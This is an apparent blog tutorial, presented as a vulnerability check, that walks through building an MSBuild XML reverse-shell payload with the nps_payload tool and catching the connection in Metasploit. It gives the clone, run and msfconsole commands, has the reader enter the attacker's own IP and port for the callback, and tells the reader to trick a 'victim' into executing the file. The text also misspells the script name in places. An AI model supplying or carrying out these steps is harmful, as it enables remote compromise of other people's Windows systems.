In this tutorial, we will get to know if our windows system is vulnerable to XML or not.

for this tutorial, I will use a tool that is not too famous and I will also use the Metasploit whichh is quite famous these days.

ATTACK

first of all download this tool from GitHub with this command:

git clone https://github.com/trustedsec/nps_payload.git

now go to the download folder. we will use python3 to run this.

python3 nsp_payload.py

or

./nsp_payload.py

 

after running the command it will ask you to choose some options.

1. first we will choose to make a payload in XML

2. now it will ask you to choose among TCP HTTP and HTTPS. we will select 1 for TCP.

3. now give your local IP and local port.

our half work is done.

now that we have an XML and a Metasploit module, we can use these to hack into windows.

run this command to use the module:

msfconsole -r msbuild_nps.rc

after this, you will need to find a way to make your victim execute this file on a windows system with MSBuild.

go to cmd Microsoft.net framework dir and run this command:

MSbuild.exe msbuild_nps.xml

 

That’s it. now check your Metasploit. there might be a session. but if it doesn’t dont panic. it can take a while.

 

 

 

 

Thanks For Visiting.

LEAVE A REPLY

Please enter your comment!
Please enter your name here